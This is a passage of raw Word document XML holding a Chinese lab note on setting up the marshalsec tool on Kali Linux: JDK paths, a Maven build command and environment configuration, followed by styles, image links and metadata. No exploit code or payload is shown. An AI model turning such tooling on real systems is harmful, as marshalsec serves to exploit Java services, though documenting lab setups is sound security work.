        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve"> /opt/jdk1.8.0_251/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC6EB5" w14:textId="5884C97A" w:rsidR="007D48F5" w:rsidRPr="00C8214D" w:rsidRDefault="00C8214D" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00C8214D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00C8214D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00C8214D">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00C8214D">
        <w:t xml:space="preserve"> 下载并编译</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00C8214D">
        <w:t>marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20CC780D" w14:textId="6EFBDC83" w:rsidR="003C46F3" w:rsidRPr="00FC1E81" w:rsidRDefault="003C46F3" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>从GitHub上下载</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后要注意需要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>maven进行生成jar包，进入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>目录后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061A89E" w14:textId="4C34E106" w:rsidR="003C46F3" w:rsidRPr="00FC1E81" w:rsidRDefault="003C46F3" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>mvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve"> clean package -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>Dmaven.test.skip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A98304" w14:textId="03675F5C" w:rsidR="00591CC8" w:rsidRPr="00FC1E81" w:rsidRDefault="00591CC8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>但是kali默认是没有下载maven的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>我们需要从网上下载后把他解压到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>opt上再到~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>中去配置他的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境，同样我在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>/profile中配置是没有效果的</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00591CC8" w:rsidRPr="00FC1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CAB80D" w14:textId="77777777" w:rsidR="00D4725F" w:rsidRDefault="00D4725F" w:rsidP="00825154">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AC96C39" w14:textId="77777777" w:rsidR="00D4725F" w:rsidRDefault="00D4725F" w:rsidP="00825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532EC" w14:textId="77777777" w:rsidR="00D4725F" w:rsidRDefault="00D4725F" w:rsidP="00825154">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="060DB5D2" w14:textId="77777777" w:rsidR="00D4725F" w:rsidRDefault="00D4725F" w:rsidP="00825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A4CFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E34616E"/>
    <w:lvl w:ilvl="0" w:tplc="9D52E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FB"/>
    <w:rsid w:val="000967B0"/>
    <w:rsid w:val="000C7B7A"/>
    <w:rsid w:val="000E38B8"/>
    <w:rsid w:val="000E7E86"/>
    <w:rsid w:val="001274F0"/>
    <w:rsid w:val="00172B49"/>
    <w:rsid w:val="0024206C"/>
    <w:rsid w:val="00280707"/>
    <w:rsid w:val="003555F6"/>
    <w:rsid w:val="003C46F3"/>
    <w:rsid w:val="00413FD9"/>
    <w:rsid w:val="00421BA8"/>
    <w:rsid w:val="00474F41"/>
    <w:rsid w:val="00477780"/>
    <w:rsid w:val="004A2BA4"/>
    <w:rsid w:val="005628E2"/>
    <w:rsid w:val="00591CC8"/>
    <w:rsid w:val="005949AA"/>
    <w:rsid w:val="005C19FF"/>
    <w:rsid w:val="006F1795"/>
    <w:rsid w:val="00723368"/>
    <w:rsid w:val="007972DE"/>
    <w:rsid w:val="007A38D7"/>
    <w:rsid w:val="007C2A8C"/>
    <w:rsid w:val="007D48F5"/>
    <w:rsid w:val="0081592D"/>
    <w:rsid w:val="00825154"/>
    <w:rsid w:val="008923FC"/>
    <w:rsid w:val="008A3311"/>
    <w:rsid w:val="008A71FB"/>
    <w:rsid w:val="008D5DD4"/>
    <w:rsid w:val="00982180"/>
    <w:rsid w:val="00A27BB9"/>
    <w:rsid w:val="00AF6629"/>
    <w:rsid w:val="00B2783B"/>
    <w:rsid w:val="00B42E1C"/>
    <w:rsid w:val="00B9152F"/>
    <w:rsid w:val="00BB42A1"/>
    <w:rsid w:val="00C44D32"/>
    <w:rsid w:val="00C8214D"/>
    <w:rsid w:val="00D427D8"/>
    <w:rsid w:val="00D4725F"/>
    <w:rsid w:val="00DC25E7"/>
    <w:rsid w:val="00E71E02"/>
    <w:rsid w:val="00EB0C2A"/>
    <w:rsid w:val="00EC0232"/>
    <w:rsid w:val="00EF5675"/>
    <w:rsid w:val="00FC1719"/>
    <w:rsid w:val="00FC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8F592"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A8396AB2-75E9-4867-B69E-52A690C3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2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正文2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="20"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="000E38B8"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="正文2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:rsid w:val="000E38B8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21BA8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="2"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00421BA8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21BA8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28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81592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1592D"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B2783B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005628E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28E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44D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4D32"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern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8251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82515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8251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8251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AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/$0$LLUOS58YRLKMNX5ORN~5.png" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/~(H48J8IFKG~2Q%7b5HJ7E9Y9.png" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/@YG6MNVV(_%60S%7d5$P(YM))HA.png" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/EY7ZK0_NF)XG%7bT6QEIT3%60M5.png" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/3~664M1T%60%25G3~_DY499I6UQ.png" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/49C%60A7CQB%5dW%6008X$~~3)F~A.png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../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/AXQ%5b74TG9$)$N_@A070O9%5bN.png" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/%5dM(ZCZ%5d$J23$)@B%7dB(N5%25G5.png" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/@384S%5bX_%60%5b4MPJ_T~2CDKMX.png" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/_BDDQLPM16S~_W%25E1PN5URT.png" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/%25N05E6O$Z7CPE$ISLBX70%5d6.png" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/P%5d7Y4%5bDPHXR7IT2%256P32LQG.png" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/P4$Z4P%7dZS$Y(QI9S$262A%5dC.png" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/773)7)_Q%7b%5d(Y%25$A%7b~%5bN25HO.png" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/0FFSQL8AXVKN%5bDIA%5dQREET6.png" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/E%60%25W%5dFX9%5bW$RPETW%5b30K9PK.png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../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/_%7d(R3C%5bZH%7b%25@%7b35KRZ~1LVI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../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/9CV2G%5bYUQ%7bE7IPN%7d(I%7dHQVE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../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/M8V_UFUJ)I7XEN5V%25XF%5b833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../AppData/Roaming/Tencent/Users/1152988120/QQ/WinTemp/RichOle/57AN%5b3TDK%25~@N3M~%5bW_L)HB.png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14</Pages>
  <Words>1660</Words>
  <Characters>9467</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>78</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11105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nsfocus</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nsfocus</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-23T01:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-28T08:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>